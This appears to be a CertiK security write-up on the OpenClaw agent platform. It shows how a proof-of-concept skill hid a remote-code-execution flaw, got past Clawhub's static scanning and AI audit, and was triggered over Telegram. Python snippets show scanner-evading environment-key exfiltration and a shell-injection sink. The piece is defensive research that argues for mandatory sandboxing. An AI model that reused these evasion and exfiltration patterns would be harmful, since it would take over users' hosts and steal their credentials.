
Is your "crayfish" running naked? CertiK test: How the vulnerable OpenClaw Skill can fool the audit and take over your computer without authorization.

2026/03/18 20:22
6 min read

Author: Certik

Recently, OpenClaw (commonly known in the industry as "Little Lobster"), an open-source, self-hosted AI agent platform, has rapidly gained popularity due to its flexible scalability and self-controllable deployment characteristics, becoming a phenomenal product in the personal AI agent field. Its core ecosystem, Clawhub, serves as an application marketplace, aggregating a massive number of third-party skill plugins that allow agents to unlock advanced capabilities with a single click, ranging from web search and content creation to encrypted wallet operation, on-chain interaction, and system automation. This has led to explosive growth in the ecosystem's scale and user base.


But where exactly is the platform's true security boundary for these third-party skills that run in high-privilege environments?

Recently, CertiK, the world's largest Web3 security company, released new research on Skill security. The research points to a widespread misconception about the security boundaries of the AI agent ecosystem: the industry generally treats "Skill scanning" as the core security boundary, yet this mechanism offers almost no resistance to real attackers.

If we compare OpenClaw to the operating system of a smart device, then Skills are the various apps installed on that system. Unlike ordinary consumer-grade apps, some Skills in OpenClaw run in a high-privilege environment, allowing them to directly access local files, call system tools, connect to external services, execute commands in the host environment, and even manipulate the user's encrypted digital assets. Once a security issue arises, it can directly lead to serious consequences such as the leakage of sensitive information, remote takeover of the device, and the theft of digital assets.

Currently, the industry-wide standard security solution for third-party skills is "pre-listing scanning and review." OpenClaw's Clawhub has also built a three-layer review and protection system: integrating VirusTotal code scanning, a static code analysis engine, and AI logic consistency detection, pushing security pop-ups to users based on risk levels, attempting to safeguard ecosystem security. However, CertiK's research and proof-of-concept attack tests have confirmed that this detection system has shortcomings in real-world attack and defense scenarios and cannot shoulder the core responsibility of security protection.

The study first dismantles the inherent limitations of existing detection mechanisms:

Static detection rules are easily bypassed. The engine relies on matching code features to identify risks; for example, it might flag the combination of "reading sensitive environment data" and "sending outbound network requests" as high-risk behavior. However, an attacker only needs slight syntactic changes to evade feature matching while keeping the malicious logic intact. It is like swapping dangerous words for synonyms, rendering the security scanner ineffective.
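To make the bypass concrete, here is a minimal hypothetical sketch. The scanner rule and both code snippets below are invented for illustration; they are not Clawhub's actual detection engine. A naive feature-matching rule catches the literal pattern, while semantically identical code restructured with indirect imports slips through:

```python
# Hypothetical feature-matching rule: flag code that both reads
# environment variables and posts data over the network. (Invented
# for illustration; not Clawhub's real engine.)
def naive_scan(code: str) -> bool:
    return "os.environ" in code and "requests.post" in code

# Straightforward exfiltration: both literal features are present.
flagged = (
    "import os, requests\n"
    "requests.post(url, data=os.environ['API_KEY'])\n"
)

# The same malicious logic, trivially restructured: indirect imports
# and string-built attribute names leave no literal features to match.
evasive = (
    "import importlib\n"
    "env = getattr(importlib.import_module('os'), 'environ')\n"
    "http = importlib.import_module('requests')\n"
    "getattr(http, 'po' + 'st')(url, data=env['API_KEY'])\n"
)

print(naive_scan(flagged))   # detected
print(naive_scan(evasive))   # bypassed
```

The behavior of the two snippets is identical at runtime, which is exactly why signature-style static rules cannot serve as a security boundary on their own.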

AI auditing has inherent blind spots. Clawhub's AI audit is positioned as a "logic consistency detector": it can only flag obviously malicious code whose declared functionality does not match its actual behavior, and is helpless against exploitable vulnerabilities hidden inside otherwise normal business logic. It is like trying to spot a fatal trap buried deep in the terms of a seemingly compliant contract.

Even more critically, the review process has a fundamental design flaw: even while a VirusTotal scan is still in a "pending" state, a Skill that has not completed the full vetting process can be uploaded and made public, and users can install it without any warning, leaving an open window for attackers.

To verify the true severity of the risk, the CertiK research team completed a full test. The team developed a skill called "test-web-searcher," which appears to be a fully compliant web search tool with code logic that conforms to standard development practices. However, it actually embeds a remote code execution vulnerability within its normal functional flow.

This skill bypassed both the static engine and the AI review, and could be installed with no security warnings while its VirusTotal scan was still pending. Finally, a command sent remotely via Telegram triggered the vulnerability and achieved arbitrary command execution on the host device (in the demonstration, the system calculator was popped up remotely).
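CertiK does not publish the PoC's internals, but the vulnerability class it describes can be sketched as follows. Everything here is a hypothetical illustration, with invented function names: a "web searcher" skill whose normal flow shells out with unsanitized input, so that a crafted query (for example, one arriving via a Telegram command) executes attacker-controlled commands:

```python
import subprocess

# Hypothetical sketch of the vulnerability class described above.
# Function names and the echo-based "search" are invented placeholders.
def fetch_results_vulnerable(query: str) -> str:
    # Looks like ordinary tooling, but shell=True means shell
    # metacharacters in the query become executable commands.
    return subprocess.run(
        f"echo searching: {query}",
        shell=True, capture_output=True, text=True,
    ).stdout

def fetch_results_safe(query: str) -> str:
    # Argument list with shell=False: the query is data, never code.
    return subprocess.run(
        ["echo", "searching:", query],
        capture_output=True, text=True,
    ).stdout

payload = "crypto news; echo PWNED"
print(fetch_results_vulnerable(payload))  # the injected command runs
print(fetch_results_safe(payload))        # the payload is printed verbatim
```

Because the dangerous call sits inside a plausible business-logic path, neither feature matching nor a "declared vs. actual behavior" check is likely to flag it.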

CertiK's research explicitly points out that these issues are not product bugs unique to OpenClaw, but rather a common misconception in the entire AI agent industry: the industry generally treats "approval scanning" as the core security defense, while neglecting the true foundation of security, which is mandatory isolation and granular permission control at runtime. This is similar to the core security of Apple's iOS ecosystem, which has never been the strict approval process of the App Store, but rather the system's mandatory sandbox mechanism and granular permission control, ensuring that each app can only run in its own dedicated "isolation chamber" and cannot arbitrarily obtain system permissions.

However, OpenClaw's existing sandbox mechanism is optional rather than mandatory and highly dependent on manual configuration by users. Most users choose to disable the sandbox to ensure the functionality of the Skills, ultimately leaving the agent in a "naked" state. Once a Skill with vulnerabilities or malicious code is installed, it will directly lead to catastrophic consequences.

In response to the issues discovered, CertiK has also provided security guidelines:

  • For developers of AI agents such as OpenClaw, sandbox isolation must be set as the default mandatory configuration for third-party skills, and the permission control model of skills must be refined. Third-party code must never be allowed to inherit the high privileges of the host machine by default.
  • For ordinary users, a skill labeled "safe" in the Skill Marketplace simply means that it has not been detected as risky, not that it is absolutely safe. Until the official strong isolation mechanism is set as the default configuration, it is recommended to deploy OpenClaw on unimportant idle devices or virtual machines, and never place it near sensitive files, password credentials, or high-value encrypted assets.
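The "deny by default" idea behind the developer guideline can be sketched minimally. This is a hypothetical illustration, not OpenClaw's actual mechanism: third-party skill code runs in a child process with a scrubbed environment, so it cannot passively inherit host secrets. A real sandbox would also need filesystem, network, and syscall isolation (containers, seccomp, etc.); this only shows the permission-allowlist principle:

```python
import os
import subprocess
import sys

# Hypothetical allowlist: environment variables a skill is permitted
# to see. Everything else is stripped before the skill runs.
ALLOWED_ENV = {"PATH", "LANG"}

def run_skill(skill_code: str) -> subprocess.CompletedProcess:
    # Execute untrusted skill code in a child process with a clean
    # environment instead of inheriting the host's full privileges.
    clean_env = {k: v for k, v in os.environ.items() if k in ALLOWED_ENV}
    return subprocess.run(
        [sys.executable, "-c", skill_code],
        env=clean_env, capture_output=True, text=True, timeout=10,
    )

# Simulate a host secret, then let a skill probe for it:
os.environ["WALLET_PRIVATE_KEY"] = "secret"
probe = "import os; print(os.environ.get('WALLET_PRIVATE_KEY'))"
print(run_skill(probe).stdout)  # the secret is not inherited
```

The key design choice is that the skill never has to be trusted: access is granted per variable, rather than revoked after the fact.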

The AI agent sector is on the verge of explosive growth, but the pace of ecosystem expansion must not outstrip the pace of security development. Review and scanning can stop only basic malicious attacks; they can never constitute a security boundary for high-privilege agents. Only by shifting from "pursuing perfect detection" to "assuming risks exist and mitigating the damage," and by enforcing isolation boundaries at the runtime level, can we truly hold the security bottom line for AI agents and keep this technological revolution on a steady, long-term course.

